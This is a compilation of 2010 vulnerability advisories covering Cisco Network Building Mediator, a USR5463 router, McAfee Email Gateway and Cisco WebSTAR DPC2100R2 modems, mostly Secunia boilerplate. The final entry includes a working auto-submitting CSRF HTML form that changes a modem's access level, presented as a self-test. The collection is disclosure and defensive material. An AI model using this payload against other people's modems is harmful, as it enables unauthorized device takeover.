Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0438 | No CVE | U.S.Robotics USR5463 firmware '/cgi-bin/setup_ddns.exe' cross-site request forgery vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
U.S.Robotics USR5463 is a popular router device in foreign countries. The application device does not properly perform any legal verification of the request, allowing the user to perform partial management operations through HTTP requests. If you build malicious parameters passed to the /cgi-bin/setup_ddns.exe script and entice the user to click, you can change the device configuration and more. U.S.Robotics USR5463 firmware is prone to a cross-site request-forgery vulnerability.
Successful exploits may allow attackers to perform unauthorized actions on the affected device in the context of a logged-in user. This may allow attackers to gain access to or modify sensitive information and perform HTML-injection attacks.
U.S.Robotics USR5463 firmware versions 0.01 through 0.06 are vulnerable. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
USR5463 802.11g Wireless Router Cross-Site Request Forgery
SECUNIA ADVISORY ID:
SA39889
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39889/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39889
RELEASE DATE:
2010-05-25
DISCUSS ADVISORY:
http://secunia.com/advisories/39889/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39889/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39889
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
David K. has reported a vulnerability in the USR5463 802.11g Wireless
Router, which can be exploited by malicious people to conduct
cross-site request forgery attacks. This can be exploited to e.g. conduct script insertion
attacks via specially crafted parameters passed to the
/cgi-bin/setup_ddns.exe script.
SOLUTION:
Do not browse untrusted websites or follow untrusted links while
logged-in to the device.
PROVIDED AND/OR DISCOVERED BY:
David K.
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0134 | CVE-2010-2116 | McAfee Email Gateway of Web Vulnerability in which write permission is acquired in the interface |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
The web interface in McAfee Email Gateway (formerly IronMail) 6.7.1 allows remote authenticated users, with only Read privileges, to gain Write privileges to modify configuration via the save action in a direct request to admin/systemWebAdminConfig.do. Secure Mail is prone to a remote security vulnerability. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
McAfee Email Gateway Web Access Security Bypass Vulnerability
SECUNIA ADVISORY ID:
SA39881
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39881/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39881
RELEASE DATE:
2010-05-24
DISCUSS ADVISORY:
http://secunia.com/advisories/39881/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39881/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39881
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Nahuel Grisol\xeda has reported a vulnerability in McAfee Email Gateway,
which can be exploited by malicious users to bypass certain security
restrictions.
The vulnerability is caused due to the Web Access interface
performing insufficient checks for requests received from
unprivileged users. This can be exploited by a user without write
privileges to make configuration changes and e.g. add an
administrative user.
The vulnerability is reported in version 6.7.1. Other versions may
also be affected.
SOLUTION:
Restrict access to the Web Access console to trusted users only.
PROVIDED AND/OR DISCOVERED BY:
Nahuel Grisol\xeda, Cybsec
ORIGINAL ADVISORY:
Cybsec:
http://www.cybsec.com/vuln/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0198 | CVE-2010-2025 |
Cisco Scientific Atlanta WebSTAR DPC2100R2 Debug Demodulator Cross-Site Request Forgery Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201005-0342 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 allow remote attackers to hijack the authentication of administrators for requests that (1) reset the modem, (2) erase the firmware, (3) change the administrative password, (4) install modified firmware, or (5) change the access level, as demonstrated by a request to goform/_aslvl. The Cisco DPC2100R2 is a cable TV CABLE MODEM. - Cross-site request forgery attacks. Multiple functions provided by the WEB interface cannot establish a session correctly and restrict access by authorized users. - The Cisco DPC2100R2 device has access control mechanisms of 0-2 (some devices are 0-3). Due to the lack of proper checking for some operations that require authorization, the attacker submits a specially constructed POST request without any verification reset. Equipment and installation of new software. Other attacks are also possible.
Firmware versions prior to 2.0.2.r1256-100324as are vulnerable. \xa0Testing was
performed on a DPC2100R2 modem, with firmware v2.0.2r1256-060303.
1. \xa0An attacker may create a
malicious website that, when visited by a victim, updates these settings on the
victim's modem on the victim's behalf without their authorization or need for
any additional user interaction. \xa0This issue has been assigned CVE-2010-2025.
2. Insufficient authentication. The modem's access control scheme, which has
levels numbered from 0-2 (or 0-3 on some other models), is not properly checked
before performing operations that should require authentication, including
resetting the modem and installing new firmware. The modem requires the proper
access level to access web interface pages containing forms that allow a user
to perform these actions, but does not properly authenticate the pages that
actually carry out these actions. By sending a POST request directly to these
pages, these actions may be performed without any authentication. Attacks may
be performed by an attacker on the local network or by leveraging the CSRF
vulnerability. This issue has been assigned CVE-2010-2026.
==Identifying Vulnerable Installations==
Most home installations of this modem will feature a web interface that is
accessible at "http://192.168.100.1". \xa0The following proof-of-concept code may
be used to test for vulnerability. \xa0It leverages the CSRF vulnerability to
change the access level of your modem to the most restrictive settings (a
harmless action). \xa0If your modem is vulnerable, then you will be presented with
a message stating that your settings have been successfully updated. \xa0If you
are greeted with a page stating there was a "Password confirmation error", then
your modem password has been changed from the default but you are still
vulnerable. \xa0If you are greeted with an HTTP authentication form or other
message, then your model is not vulnerable.
<html>
<head>
<title>Test for CSRF vulnerability in WebSTAR modems</title>
</head>
<body>
<form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl">
<input type="hidden" name="SAAccessLevel" value="0">
<input type="hidden" name="SAPassword" value="W2402">
</form>
<script>document.csrf.submit()</script>
</body>
</html>
==Solution==
In most cases, home users will be unable to update vulnerable firmware without
assistance from their cable providers. \xa0For
the DPC2100R2 modems, the latest version string is
dpc2100R2-v202r1256-100324as.
To prevent exploitation of CSRF vulnerabilities, users are always encouraged
to practice safe browsing habits and avoid visiting unknown or untrusted
websites.
==Credits==
These vulnerabilities were discovered by Dan Rosenberg
(dan.j.rosenberg@gmail.com).
Thanks to Matthew Bergin for suggesting I should look at cable modems.
==Timeline==
1/26/10 - Vulnerability reported to Cisco
1/26/10 - Response, issue assigned internal tracking number
2/26/10 - Status update requested
2/26/10 - Response
5/15/10 - Status update requested
5/17/10 - Response, confirmation that newest firmware resolves issues
5/17/10 - Disclosure date set
5/24/10 - Disclosure
==References==
CVE identifiers CVE-2010-2025 and CVE-2010-2026 have been assigned to these
issues